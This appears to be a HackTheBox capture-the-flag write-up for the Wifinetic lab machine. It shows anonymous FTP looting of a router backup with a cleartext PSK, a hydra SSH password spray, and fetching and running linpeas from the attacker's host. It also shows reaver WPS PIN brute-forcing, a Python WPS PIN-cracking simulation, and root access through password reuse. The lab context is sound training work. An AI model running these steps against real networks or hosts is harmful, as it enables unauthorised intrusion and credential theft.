HTB - Wifinetic
Wifinetic is an easy difficulty Linux machine which presents an intriguing network challenge, focusing on wireless security and network monitoring.
Last updated
Scope
IP Address: 10.10.11.247
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp filtered smtp
53/tcp open domain
143/tcp filtered imap
* Open ports: 21 (ftp), 22 (ssh), 53 (domain)
* Filtered ports: 25 (smtp), 143 (imap)
* Important Notes: the fast scan only covers the top 100 TCP ports and gives no versions; FTP is the first thing to check for anonymous login.
FTP
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ tree -a 10.10.11.247
10.10.11.247
├── .listing
├── MigrateOpenWrt.txt
├── ProjectGreatMigration.pdf
├── ProjectOpenWRT.pdf
├── backup-OpenWrt-2023-07-26.tar
└── employees_wellness.pdf
Take a look at backup-OpenWrt-2023-07-26.tar. It is a backup of an OpenWrt router's configuration files under /etc, which is exactly where credentials tend to live:
┌──(kali㉿kali)-[~/…/HTB/machines/Wifinetic/10.10.11.247]
└─$ tar -xvf backup-OpenWrt-2023-07-26.tar
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder
┌──(kali㉿kali)-[~/…/Wifinetic/10.10.11.247/etc/config]
└─$ cat wireless
<snip>
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
So the wireless config defines two interfaces that share one SSID and one PSK: wifinet0 is an access point (mode 'ap') on radio0 with WPS push-button enabled, and wifinet1 is a station (mode 'sta') on radio1 that connects to that network. UCI stores the PSK in cleartext, so the backup hands it to anyone who can read it:
wifinet0 (ap): OpenWrt:VeRyUniUqWiFIPasswrd1!
wifinet1 (sta): OpenWrt:VeRyUniUqWiFIPasswrd1!
The obvious next step is to test this password for reuse against the local accounts listed in the backup's /etc/passwd.
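Reviewing a recovered OpenWrt backup by hand does not scale, so here is an added example (not part of the original writeup) of a small UCI parser that pulls every wifi-iface section out of /etc/config/wireless and reports the findings a reviewer cares about: cleartext PSKs and WPS being enabled on an AP. The sample input is constructed from the two sections shown above plus a hypothetical wifi-device section for radio0; the function names are my own.

```python
import shlex
from typing import Dict, List

# Constructed sample: the wifi-iface sections recovered from the backup's
# /etc/config/wireless (values as shown above) plus a hypothetical
# wifi-device section so the parser has a non-iface section to skip.
SAMPLE_WIRELESS = """
config wifi-device 'radio0'
    option type 'mac80211'
    option channel '1'

config wifi-iface 'wifinet0'
    option device 'radio0'
    option mode 'ap'
    option ssid 'OpenWrt'
    option encryption 'psk'
    option key 'VeRyUniUqWiFIPasswrd1!'
    option wps_pushbutton '1'

config wifi-iface 'wifinet1'
    option device 'radio1'
    option mode 'sta'
    option network 'wwan'
    option ssid 'OpenWrt'
    option encryption 'psk'
    option key 'VeRyUniUqWiFIPasswrd1!'
"""


def parse_uci(text: str) -> List[Dict]:
    """Parse OpenWrt UCI syntax into a list of sections.

    Each section is {'type', 'name', 'options', 'lists'}. Handles 'config',
    'option' and 'list' lines with shell-style quoting; '#' comments and
    blank lines are ignored. Anonymous sections get name None.
    """
    sections: List[Dict] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        kind = parts[0]
        if kind == "config":
            sections.append({
                "type": parts[1],
                "name": parts[2] if len(parts) > 2 else None,
                "options": {},
                "lists": {},
            })
        elif kind == "option" and sections:
            sections[-1]["options"][parts[1]] = parts[2] if len(parts) > 2 else ""
        elif kind == "list" and sections:
            value = parts[2] if len(parts) > 2 else ""
            sections[-1]["lists"].setdefault(parts[1], []).append(value)
    return sections


def audit_wireless(text: str) -> List[str]:
    """Return one finding per weakness found in the wifi-iface sections."""
    findings: List[str] = []
    for sec in parse_uci(text):
        if sec["type"] != "wifi-iface":
            continue
        o = sec["options"]
        label = f"{sec['name']} ({o.get('mode', '?')} on {o.get('device', '?')})"
        enc = o.get("encryption", "none")
        if enc == "none":
            findings.append(f"{label}: open network, no encryption")
        elif "key" in o:
            # UCI keeps the PSK in cleartext: whoever reads the backup owns the network
            findings.append(f"{label}: cleartext PSK for SSID {o.get('ssid')!r}: {o['key']!r}")
        if o.get("mode") == "ap" and o.get("wps_pushbutton") == "1":
            findings.append(f"{label}: WPS enabled (wps_pushbutton=1), PIN brute-force target")
    return findings


if __name__ == "__main__":
    for finding in audit_wireless(SAMPLE_WIRELESS):
        print(finding)
```

Run against the real file with `audit_wireless(open("etc/config/wireless").read())`. The same parser works for /etc/config/dropbear, network and firewall, which are also worth a look in a backup like this.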
┌──(kali㉿kali)-[~/…/machines/Wifinetic/10.10.11.247/etc]
└─$ cat passwd | cut -d: -f1 | tee -a users.list
root
daemon
ftp
network
nobody
ntp
dnsmasq
logd
ubus
netadmin
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ hydra -L users.list -p 'VeRyUniUqWiFIPasswrd1!' ssh://$ip
<snip>
[22][ssh] host: 10.10.11.247 login: netadmin password: VeRyUniUqWiFIPasswrd1!
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ ssh netadmin@$ip
<snip>
System load: 0.07
Usage of /: 64.5% of 4.76GB
Memory usage: 6%
Swap usage: 0%
Processes: 226
Users logged in: 0
IPv4 address for eth0: 10.10.11.247
IPv6 address for eth0: dead:beef::250:56ff:fe94:12df
IPv4 address for wlan0: 192.168.1.1
IPv4 address for wlan1: 192.168.1.23
netadmin@wifinetic:~$
netadmin@wifinetic:~$ cat user.txt
15b1159827f23a58a86df2f4ee876256
User flag: 15b1159827f23a58a8xxxxxxxxxxxxxx
netadmin@wifinetic:~$ wget 10.10.16.25/linpeas.sh && chmod +x linpeas.sh
netadmin@wifinetic:~$ ./linpeas.sh | tee -a lin.ouput
<snip>
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
<snip>
All of the above are standard cap_net_raw binaries except reaver, so I looked up what that tool does.
Wi-Fi Protected Setup (WPS) is a standard designed to make joining a Wi-Fi network easier, especially in home settings: the router has an 8-digit PIN printed on it, and a client that presents the correct PIN is handed the network's WPA PSK. reaver is a tool that brute-forces the WPS PIN of an access point; cap_net_raw is what lets it send raw 802.11 frames without being root.
netadmin@wifinetic:~$ reaver -h
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [10]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows 7 registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
I run ifconfig to see the available interfaces:
netadmin@wifinetic:~$ ifconfig
<snip>
mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 37744 bytes 6689251 (6.6 MB)
RX errors 0 dropped 37744 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:0 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:00:00 txqueuelen 1000 (Ethernet)
RX packets 720 bytes 77584 (77.5 KB)
RX errors 0 dropped 179 overruns 0 frame 0
TX packets 937 bytes 120581 (120.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:100 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)
RX packets 388 bytes 53737 (53.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 720 bytes 90544 (90.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan2: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
At first glance, mon0 is a monitor-mode interface and the wlanX interfaces belong to the access point and clients running on this machine.
The next step is to get more info about these APs
netadmin@wifinetic:~$ iwconfig
<snip>
wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:2 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:2 Missed beacon:0
From the iwconfig output: mon0 is the monitor-mode interface we attack from. wlan0 is in Master mode, so it is the access point, and its MAC 02:00:00:00:00:00 is the BSSID. wlan1 is a client in Managed mode associated to that BSSID on channel 1 (2.412 GHz) with ESSID "OpenWrt", and wlan2 is an idle, unassociated client. The target for reaver is therefore BSSID 02:00:00:00:00:00 (the "Access Point" field shown on wlan1).
I can now start reaver to brute-force the WPS PIN:
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtxxxxxxxxxxx'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.
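The M1 to M7 exchange above is what makes the PIN attack cheap: after M4 the AP has already proven or rejected the first half of the PIN, and only a correct first half gets as far as M6, where the second half is checked. That leak splits a 10^7 search into at most 10^4 + 10^3 = 11,000 attempts (the eighth digit is a checksum, not a free digit). The following added example, which is mine and not code from the writeup or from reaver, implements the WSC PIN checksum, a simulated registrar that NACKs at M4 or M6 like the real AP, and the split brute force against it. The secret PIN is the one recovered above; reaver tried 12345670 as its very first candidate, which is why the page's run finished in 2 seconds, whereas the simulation walks the halves in order.

```python
from typing import Callable, Tuple

# Constructed secret: the PIN reaver recovered above. The simulated AP
# behaves the same for any 8-digit PIN with a valid checksum digit.
TARGET_PIN = "12345670"


def wps_pin_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN (WSC spec; same loop hostapd uses)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True if the 8-digit PIN's last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


def make_ap_oracle(secret: str) -> Callable[[str], str]:
    """Simulate the registrar side of the WSC exchange for one PIN attempt.

    A wrong first half is rejected when the AP checks it after M4; only a
    correct first half reaches M6, where the second half is checked. The
    return value tells the attacker which stage failed, exactly the leak
    reaver exploits.
    """
    def oracle(pin: str) -> str:
        if pin[:4] != secret[:4]:
            return "NACK@M4"
        if pin[4:] != secret[4:]:
            return "NACK@M6"
        return "M7"
    return oracle


def crack_wps_pin(oracle: Callable[[str], str]) -> Tuple[str, int]:
    """Split brute force: at most 10**4 + 10**3 = 11,000 oracle calls.

    Returns (recovered_pin, attempts). Phase 1 fixes the first four digits;
    phase 2 enumerates the three free digits of the second half, deriving the
    checksum digit rather than guessing it.
    """
    attempts = 0
    first_half = None
    for h1 in range(10_000):
        # Second half does not matter yet; send 000 plus a valid checksum.
        pin7 = h1 * 1000
        pin = f"{pin7:07d}{wps_pin_checksum(pin7)}"
        attempts += 1
        if oracle(pin) != "NACK@M4":
            first_half = h1
            break
    if first_half is None:
        raise RuntimeError("first half not found")
    for h2 in range(1000):
        pin7 = first_half * 1000 + h2
        pin = f"{pin7:07d}{wps_pin_checksum(pin7)}"
        attempts += 1
        if oracle(pin) == "M7":
            return pin, attempts
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    pin, n = crack_wps_pin(make_ap_oracle(TARGET_PIN))
    print(f"recovered PIN {pin} after {n} attempts")
```

Real APs rate-limit or lock WPS after a run of failures (reaver's -l and -x options exist for that), and the Pixie Dust variant (-K) needs no brute force at all when the AP's nonces are weak; the oracle here models only the M4/M6 leak, which is enough to see why an 8-digit PIN offers roughly 11,000 guesses of security rather than 10^8.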
There is no obvious path to root from here, so I will try the WPA PSK recovered above as the root password, on the assumption that it was reused the same way the Wi-Fi password was reused for netadmin:
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin#
Success :)
root@wifinetic:~# cat root.txt
1114dd5c6d353295d878xxxxxxxxxxxxxx
Root flag: 1114dd5c6d353295d8xxxxxxxxxxxxx